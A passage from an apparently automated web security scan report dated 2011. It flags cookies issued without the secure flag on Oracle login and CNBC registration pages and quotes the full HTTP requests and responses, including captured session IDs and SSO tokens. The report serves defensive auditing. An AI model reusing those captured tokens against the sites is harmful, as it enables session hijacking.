d; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000J8zXg116uHK6EVADUS1EHWFB01taYd
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:16:28 GMT; path=/
Content-Length: 2359

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

7.35. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/pls/orasso/orasso.wwsso_app_admin.ls_login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

OAM_REQ=VERSION_4~1UuUhb3VlJjpjbcfM%2bCo%2b%2bMiWJ2ThT1j0zV2GIRgsiVXHKq1wWviikzjAmSMNpHcxw1rhPxnndOe6siHyjxtbEM%2buYuUn%2bUvYKd01%2bdN5qmbCefoBjLXOdBrDbalBGhTFH1mcenZ6VQcZOtiYN8%2b2RhWlQVpI0kTgRyqGG40EECD4CxAU4gDEYcZmI2B3wNkljoMdwVuaGWnut3Ws3E5AmamcNRVrdECimq1Mq%2f26%2bWfrUnoqmsx7kxOsJNewr%2bnbiYvS6wDHfxOtJWhU9pUItq8bUkoQwr7H5isBCh5meyvKe8ms68i55w4CahCTz3p6A01AM2dYBzGmRORCv6MqWPBKK5rVQPutfIo4HtNsfY2j5bm56F%2fzt94BzXXWxxsIhITfd%2b5we89fEJFZ2CTJgrZuXFNGB8jvQYx1YE6%2b7ASPoQu6ptzJ7jgdMAcNsxu50KMjCTA9dS18y7RfMmioWGVZaXuiTS26UzYRBWtMqgP6BhdQZSlRcjTcuc46NN8nrnPWOZL4K3h0yZI3vi8mV4sFUAHB2aS%2fObCAYn0yTQ3hhne5ezNrHo%2bH9c64NxLbPfw7eZU0b%2b4HhsFiPrF8I3JW0kUOq2JgvMJfMrL2huNN1Zpg%2bCEZraUo1TgPJ0143QFgYSJe1eczDw2MyCnfK3oh6Qtd7KYCYZqmx2UGJZqdGMHwEYjBtChCnZ%2bAYXC52A7T7BfE9%2bsU5UIViqxLMgLQufDXehYMfsh5xmRetJCVQjKlYhNt7oMAXSuo9O2k7OMGli%2fN4scZh0Pzed3GEjYCczp0U22FIrQ0m%2f%2bmzDHuyeEtas2vlW6JqELbY%2fxow1EezrQ%2bGYJaUxmUmB0yGsjb2F1Rp7CJPqKBgfXUpG7wnI326ZeV6pmgG9tMIY562dx0jU2RAMPJ1RgtCLRBoiQfe5PC4CVl2COVV%2fQGPEJ08Ey9H8gUzMJnEcE45wTXctneFvp7B%2bb%2fqrgJErqrGicSt5dbvcFIsmoCMx7XapdWZKlBi1mu98HJYyULu6G89uz7J7F1OUfVHXvohzzOrSr%2becHY4ndhIRFBwY5sSgv%2bNzfUhO9kDgCTx%2bkyBXZS4ENTxntnbFbXdYwDRUy3ced%2bRD1gv6b5Z1m46L2ASxzktwc8%2ft6h2e%2fZddmlbvJWSuAKXOVJnZPHeqq52brL9R2gKGGj8BrRjerqgBbjDog3QbuqH%2fVAGSNF0SzQwxZUJ6%2bWrNxH4KdRN3jYQrSX8x8LET%2fNACGe9jkZHVZWQKO6%2bAYVadrfVlSSL%2fxDUaDg6rdboxh8xYhMFUB1iAtoS0tCXjvv8L7w3iNda8ERdiiOKy%2bzqxzLqwOti%2bDPDfBmzK%2fPqcoG4eKrU2QS0uiJhNKc1LBvRBAcEjEA6JPJyO7fKHt9Cm61%2bSMW0H4YGmgW1TDtuQ81K00oZc%2bvp8PB%2f5uw3pu3y%2bMHs5TOOFMQv3Ndu%2b6mY%2bqO4nzv3w6U6u8b08hyFm08mgiATuuPlAlRk03u%2bjPRx2hAvWC8poLvKtS0wKaWl8DTa79BTB7DLE8gKChrkaHA2PeautfHjr5C7tfyfsR4L%2fPbtHU2Ei28ge9mNEOIcqrE5h53SVtUecGk51ABEcw%2bu%2f5cvPKa%2frIBDaoUQChQjGIrYSm1J8qODITQ2AJoAe%2fULjYYDVDNM9Mso54mrVWl%2fTy3IZhZNmrS0J5kUhi9G7LHhiUKSx7Y%2fC%2bSPs%2fgVaAtG2nE93v6Y%2b3XHD8w%2fvIU6%2fjajSgqSI5oTv%2bgjlFIUeIzqAc%2fJkSJ%2b8Im1uaWQrVWrz8LjrbXglHGh4%2fdkgqoMYyj85f5xa%2f0NxgBcbU%2bceGpsINAzmIfwo%3d; path=/; HttpOnly
BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:13 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010418767AFB7CACAE1E8A1D5BC67D978240D0CFE377F5A9ADE3F9C63F1468D714D8960345942853A8A315C8DEC76320F764A19C14D049E8440950AC3FCB19E8C4625DF9A3218AC7A9ED349F2636076CCFF871747F137DD74D5C63E78617CA86A85534A4BE22A035A1A5C4CE436DAA199E4D86DF00E9AC3337241384508207C772ECABF9255F75DBC84BE0AD6B9337EBE668883113A8DBFD3E00FEA9314357 HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:13 GMT
Set-Cookie: OAM_REQ=VERSION_4~1UuUhb3VlJjpjbcfM%2bCo%2b%2bMiWJ2ThT1j0zV2GIRgsiVXHKq1wWviikzjAmSMNpHcxw1rhPxnndOe6siHyjxtbEM%2buYuUn%2bUvYKd01%2bdN5qmbCefoBjLXOdBrDbalBGhTFH1mcenZ6VQcZOtiYN8%2b2RhWlQVpI0kTgRyqGG40EECD4CxAU4gDEYcZmI2B3wNkljoMdwVuaGWnut3Ws3E5AmamcNRVrdECimq1Mq%2f26%2bWfrUnoqmsx7kxOsJNewr%2bnbiYvS6wDHfxOtJWhU9pUItq8bUkoQwr7H5isBCh5meyvKe8ms68i55w4CahCTz3p6A01AM2dYBzGmRORCv6MqWPBKK5rVQPutfIo4HtNsfY2j5bm56F%2fzt94BzXXWxxsIhITfd%2b5we89fEJFZ2CTJgrZuXFNGB8jvQYx1YE6%2b7ASPoQu6ptzJ7jgdMAcNsxu50KMjCTA9dS18y7RfMmioWGVZaXuiTS26UzYRBWtMqgP6BhdQZSlRcjTcuc46NN8nrnPWOZL4K3h0yZI3vi8mV4sFUAHB2aS%2fObCAYn0yTQ3hhne5ezNrHo%2bH9c64NxLbPfw7eZU0b%2b4HhsFiPrF8I3JW0kUOq2JgvMJfMrL2huNN1Zpg%2bCEZraUo1TgPJ0143QFgYSJe1eczDw2MyCnfK3oh6Qtd7KYCYZqmx2UGJZqdGMHwEYjBtChCnZ%2bAYXC52A7T7BfE9%2bsU5UIViqxLMgLQufDXehYMfsh5xmRetJCVQjKlYhNt7oMAXSuo9O2k7OMGli%2fN4scZh0Pzed3GEjYCczp0U22FIrQ0m%2f%2bmzDHuyeEtas2vlW6JqELbY%2fxow1EezrQ%2bGYJaUxmUmB0yGsjb2F1Rp7CJPqKBgfXUpG7wnI326ZeV6pmgG9tMIY562dx0jU2RAMPJ1RgtCLRBoiQfe5PC4CVl2COVV%2fQGPEJ08Ey9H8gUzMJnEcE45wTXctneFvp7B%2bb%2fqrgJErqrGicSt5dbvcFIsmoCMx7XapdWZKlBi1mu98HJYyULu6G89uz7J7F1OUfVHXvohzzOrSr%2becHY4ndhIRFBwY5sSgv%2bNzfUhO9kDgCTx%2bkyBXZS4ENTxntnbFbXdYwDRUy3ced%2bRD1gv6b5Z1m46L2ASxzktwc8%2ft6h2e%2fZddmlbvJWSuAKXOVJnZPHeqq52brL9R2gKGGj8BrRjerqgBbjDog3QbuqH%2fVAGSNF0SzQwxZUJ6%2bWrNxH4KdRN3jYQrSX8x8LET%2fNACGe9jkZHVZWQKO6%2bAYVadrfVlSSL%2fxDUaDg6rdboxh8xYhMFUB1iAtoS0tCXjvv8L7w3iNda8ERdiiOKy%2bzqxzLqwOti%2bDPDfBmzK%2fPqcoG4eKrU2QS0uiJhNKc1LBvRBAcEjEA6JPJyO7fKHt9Cm61%2bSMW0H4YGmgW1TDtuQ81K00oZc%2bvp8PB%2f5uw3pu3y%2bMHs5TOOFMQv3Ndu%2b6mY%2bqO4nzv3w6U6u8b08hyFm08mgiATuuPlAlRk03u%2bjPRx2hAvWC8poLvKtS0wKaWl8DTa79BTB7DLE8gKChrkaHA2PeautfHjr5C7tfyfsR4L%2fPbtHU2Ei28ge9mNEOIcqrE5h53SVtUecGk51ABEcw%2bu%2f5cvPKa%2frIBDaoUQChQjGIrYSm1J8qODITQ2AJoAe%2fULjYYDVDNM9Mso54mrVWl%2fTy3IZhZNmrS0J5kUhi9G7LHhiUKSx7Y%2fC%2bSPs%2fgVaAtG2nE93v6Y%2b3XHD8w%2fvIU6%2fjajSgqSI5oTv%2bgjlFIUeIzqAc%2fJkSJ%2b8Im1uaWQrVWrz8LjrbXglHGh4%2fdkgqoMYyj85f5xa%2f0NxgBcbU%2bceGpsINAzmIfwo%3d; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000J8zXBDg6uHK6EVADUS1EHWFB01t_b1
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:13 GMT; path=/
Content-Length: 3286

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

7.36. https://register.cnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:43 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Thu, 13 Aug 2009 22:54:28 GMT
ETag: "3b-4710dd15eb100"
Accept-Ranges: bytes
Content-Length: 59
Connection: close
Content-Type: text/html
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/

<script>
window.location="http://www.cnbc.com";
</script>

7.37. https://register.cnbc.com/RandomImage.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/RandomImage.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RandomImage.jsp HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/
Content-Length: 2261

......JFIF.............C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222......2...."..............................
...[SNIP]...

7.38. https://register.cnbc.com/cas previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/cas

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:44 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cas HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:05:44 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Length: 201
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:44 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /cas was not found on this server.</p>
</body></html>
...[SNIP]...

7.39. https://register.cnbc.com/checkemail.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/checkemail.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:46 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkemail.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:46 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 231
Connection: close
Content-Type: text/xml;charset=ISO-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:46 GMT; path=/

<?xml version="1.0" encoding="ISO-8859-1"?>

<response>
<status>FAILURE</status>
<description>Email Address is required</description>
<timestamp>Tue Sep 06 11:05:46 EDT 2011</timestamp
...[SNIP]...

7.40. https://register.cnbc.com/checkpassword.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/checkpassword.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:46 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkpassword.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:46 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 226
Connection: close
Content-Type: text/xml;charset=ISO-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:46 GMT; path=/

<?xml version="1.0" encoding="ISO-8859-1"?>

<response>
<status>FAILURE</status>
<description>Password is required</description>
<timestamp>Tue Sep 06 11:05:46 EDT 2011</timestamp>

...[SNIP]...

7.41. https://register.cnbc.com/checkscreenname.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/checkscreenname.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:47 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkscreenname.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 227
Connection: close
Content-Type: text/xml;charset=ISO-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:47 GMT; path=/

<?xml version="1.0" encoding="ISO-8859-1"?>

<response>
<status>FAILURE</status>
<description>User name is required</description>
<timestamp>Tue Sep 06 11:05:47 EDT 2011</timestamp>

...[SNIP]...

7.42. https://register.cnbc.com/checkzipcode.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/checkzipcode.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:47 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkzipcode.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 226
Connection: close
Content-Type: text/xml;charset=ISO-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:47 GMT; path=/

<?xml version="1.0" encoding="ISO-8859-1"?>

<response>
<status>FAILURE</status>
<description>Zip Code is required</description>
<timestamp>Tue Sep 06 11:05:47 EDT 2011</timestamp>

...[SNIP]...

7.43. https://register.cnbc.com/createUser.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/createUser.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:45 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /createUser.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.44. https://register.cnbc.com/css/forgotPassword.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/css/forgotPassword.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/forgotPassword.css HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:49 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Mon, 01 Jun 2009 14:04:23 GMT
ETag: "415-46b49e73a87c0"
Accept-Ranges: bytes
Content-Length: 1045
Connection: close
Content-Type: text/css
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

div{}
.headerImage{margin-top:5px}
.mainContent{width:970px;padding:0px;}
.mainContent .heading{font-family:Arial;font-size:16;font-weight:bold;color:#2D648A;margin-bottom:20px;margin-top:40px;margin-
...[SNIP]...

7.45. https://register.cnbc.com/css/member_center_sytles.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/css/member_center_sytles.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/member_center_sytles.css HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:49 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT
ETag: "135b-49fc8d80f4e80"
Accept-Ranges: bytes
Content-Length: 4955
Connection: close
Content-Type: text/css
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

/* CSS Document */
.cnbc_member_center_backbg{
   background-image:url(../images/registration-04.jpg);
   background-repeat:repeat;

}

.cnbc_member_center_headerbg{
   background-image:url(../images/membe
...[SNIP]...

7.46. https://register.cnbc.com/css/newRegistration.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/css/newRegistration.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/newRegistration.css HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 20 Jan 2010 20:57:31 GMT
ETag: "1778-47d9ed5bbc4c0"
Accept-Ranges: bytes
Content-Length: 6008
Connection: close
Content-Type: text/css
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

body{background-color:#FFFFFF;margin:0px; padding:0px}
div{}
/*
border:1px solid
*/

.mainContent{width:635px;padding:0px;}

.headerMessage{font-family:Arial;font-size:17;font-weight:bold;color:#4248
...[SNIP]...

7.47. https://register.cnbc.com/css/registration.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/css/registration.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/registration.css HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:49 GMT
